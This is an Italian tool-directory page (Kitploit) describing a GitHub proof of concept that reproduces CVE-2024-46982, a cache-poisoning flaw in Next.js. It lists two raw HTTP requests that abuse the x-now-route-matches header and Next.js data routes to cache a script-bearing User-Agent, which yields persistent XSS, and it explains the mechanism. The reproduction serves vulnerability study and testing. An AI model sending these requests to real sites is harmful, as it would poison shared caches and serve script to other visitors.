Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/samuel871211/cve-2024-46982-reproduction
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza Web
GitHubsamuel871211/cve-2024-46982-reproduction

CVE-2024-46982-Reproduction

Riproduzione di CVE-2024-46982

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
7 mesi faNon ancora revisionato

Per Iniziare

  1. Installa Node.js LTS
  2. npm install
  3. npm run build
  4. npm run start

Sfruttamento 1: XSS persistente tramite avvelenamento della cache

  1. Invia la seguente richiesta HTTP (Richiesta d'attacco) usando un qualsiasi client HTTP.
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack 2. Visita http://localhost:3000 (Richiesta normale) usando un qualsiasi browser Web. CVE-2024-46982-normal

Sfruttamento 2: XSS persistente tramite avvelenamento della cache

  1. Invia la seguente richiesta HTTP (Richiesta d'attacco) usando un qualsiasi client HTTP, assicurati di sostituire "UiKoKFFGnF1td3mMyeDX5" con il tuo ".next/BUILD_ID" CVE-2024-46982-build-id
root@kitploit:~
GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack-2 2. Visita http://localhost:3000 (Richiesta normale) usando un qualsiasi browser Web. CVE-2024-46982-normal

Come funziona?

  1. x-now-route-matches è un header HTTP personalizzato riconosciuto da Next.js. Quando presente, Next.js tratta la richiesta HTTP come "SSG" (Static Site Generation), consentendo alla risposta HTTP di essere memorizzata nella cache (Cache-Control: s-maxage=1, stale-while-revalidate).

  2. ?__nextDataReq=1 è una querystring riconosciuta da Next.js. Quando presente, Next.js tratta la richiesta HTTP come "Recupero di __NEXT_DATA__".

L'analisi completa è disponibile nella sezione Credit

Credit

  • https://zhero-web-sec.github.io/research-and-things/nextjs-cache-and-chains-the-stale-elixir
Scarica lo strumento